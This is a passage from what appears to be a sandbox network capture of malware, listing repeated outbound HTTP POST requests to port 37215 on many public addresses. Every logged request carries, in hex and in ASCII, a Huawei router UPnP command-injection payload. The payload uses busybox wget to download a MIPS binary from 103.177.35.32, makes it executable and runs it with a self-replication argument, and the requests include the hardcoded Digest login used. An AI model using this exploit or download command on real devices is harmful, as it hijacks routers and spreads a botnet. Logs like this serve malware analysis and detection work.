                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3160192.168.2.234182041.10.46.15237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.659666061 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3161192.168.2.2354280157.106.140.12837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.659733057 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3162192.168.2.2345186157.84.189.3737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.659746885 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3163192.168.2.2337300197.151.2.24137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.659914970 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3164192.168.2.2355510213.28.230.6937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.659914970 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3165192.168.2.234839094.190.5.10837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.659920931 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3166192.168.2.233416881.109.178.11337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.659931898 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3167192.168.2.2339822197.110.203.18937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.659933090 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3168192.168.2.233890641.166.253.4637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.659960032 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3169192.168.2.2351002157.34.136.24937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.659974098 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
